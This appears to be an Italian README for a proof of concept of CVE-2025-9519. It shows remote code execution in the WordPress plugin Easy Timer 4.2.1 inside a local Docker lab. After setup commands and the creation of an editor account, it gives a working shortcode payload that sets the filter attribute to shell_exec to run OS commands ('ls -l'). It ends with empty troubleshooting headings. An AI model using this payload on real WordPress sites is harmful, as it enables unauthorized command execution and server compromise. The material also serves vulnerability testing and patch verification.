
Proof-of-concept exploit per CVE-2025-9519, che dimostra l'esecuzione remota di codice nel plugin WordPress Easy Timer tramite un filtro shortcode appositamente predisposto, con configurazione basata su Docker.
Fare riferimento alla documentazione ufficiale di Docker per l'installazione: Installazione Docker Engine
Dalla directory del tuo progetto:
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins
wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip
sudo docker compose restart wordpress
http://localhost:8000/Dashboard WordPress → Plugin → e clicca su .
Easy TimerAttiva
Dalla directory del tuo progetto esegui il seguente comando:
docker compose run --rm wpcli user create \
editoruser [email protected] \
--role=editor \
--user_pass=P@ssw0rd!
(nota: sostituisci con il nome utente, l'email e la password che preferisci!)
Articoli → Aggiungi nuovoBlocco shortcode e inserisci:[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
⚠️ Nota: assicurati di utilizzare un Blocco shortcode, non un blocco Paragrafo, affinché lo shortcode venga visualizzato correttamente.

Congratulazioni, hai ottenuto RCE.

sudo docker ps
Dovresti vedere qualcosa del genere:

Se gli shortcode non vengono visualizzati:
Se navigando su http://localhost:8000/ viene visualizzato Database non connesso: